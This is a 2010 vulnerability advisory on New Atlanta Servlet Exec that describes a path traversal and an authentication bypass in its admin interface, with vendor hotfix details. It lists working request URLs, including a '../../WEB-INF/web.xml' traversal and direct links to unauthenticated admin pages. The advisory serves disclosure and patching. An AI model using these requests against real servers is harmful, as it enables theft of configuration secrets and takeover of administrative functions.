New Atlanta Servlet Exec allows for the reading of system configuration files and unauthorized access to system information.
34a4088e3ba49cb55c3d0a4c393f545d9987745e1a0af51a84ec49da7a867e1f
Minded Security Labs: Advisory #MSA260209
Servlet Exec Multiple Security Issues
Tested Versions:
Servlet Exec 5.0p06 on Microsoft IIS 6.0
Minded Security ReferenceID:
MSA260209
Credits:
Discovery by
Stefano Di Paola and Giorgio Fedon of Minded Security
Stefano Di Paola stefano.dipaola [_at_] mindedsecurity.com discovered the
first issue (Path Traversal) and
Giorgio Fedon giorgio.fedon [_at_] mindedsecurity.com discovered the second
issue (Authentication Bypass)
Severity:
High: Attackers may be able to read application secrets stored in configuration
files or to bypass authentication on the Servlet Exec administrative interface.
Solution:
Update your installation with July 2010 hotfix:
http://www.newatlanta.com/c/products/servletexec/download/hotfix/showHotfixes
Summary
Minded Security Consultants discovered during a penetration testing activity that
New Atlanta Servlet Exec may permit to read system configuration files or to get
access to system information without valid credentials.
Analysis
First Issue: Path Traversal
Minded Security consultants were able to access arbitrary files on servlet exec
system path by abusing a flaw in the administration help of the ServletExec platform.
Infact, by requesting the following url:
http://<webserver>/servlet/pagecompile._admin._help._helpContent_xjsp?
page=../../WEB-INF/web.xml
It's possible to download the "web.xml" file of an application.
Second issue: Authentication Bypass
Furthermore we discovered that some functionalities of the Servlet Exec
Administrative Interface can be accessed without any valid user credential.
By supplying a properly crafted request to the Servlet interface, it's possible
to have direct access to precompiled JSP pages stored inside the "Servlet Exec
Admin" package.
The following request will display the login interface:
http://<webserver>/servlet/pagecompile._admin._login_xjsp
It's very important to observe that a direct access to "Servlet Exec
Administrative" functionalities, may lead to a full system compromise, if the
attacker is be able to deploy his own malicious code on the protected environment.
The following request will show the system properties:
http://<webserver>/servlet/pagecompile._admin._vmSystemProperties_xjsp
Other examples include, for example, the unauthorized access to the
"Log Configuration":
http://<webserver>/servlet/pagecompile._admin._SELogging_xjsp
Unauthorized access to Administrative User Management panel:
http://<webserver>/servlet/pagecompile._admin._userMgt_xjsp
Access to virtual server management:
http://<webserver>/servlet/pagecompile._admin._virtualServers_xjsp
Access to Admin Optional packages configuration section:
http://<webserver>/servlet/pagecompile._admin._optionalPackages_xjsp
Access to Data Sources configuration section:
http://<webserver>/servlet/pagecompile._admin._dataSources_xjsp
Access to Admin Debug configuration section:
http://<webserver>/servlet/pagecompile._admin._debug_xjsp
Disclosure Timeline
26/02/2009 Issue found
29/04/2010 Reported to Vendor
Disclaimer
The information within this paper may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information.
Any use of this information is at the user's own risk.
Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express
consent of Minded Security Research Lab. If you wish to reprint the
whole or any part of this Alert in any other medium excluding
electronic medium, please e-mail research_at_mindedsecurity.com
for permission.
Copyright (c) 2010 Minded Security, S.r.l..
All rights reserved worldwide.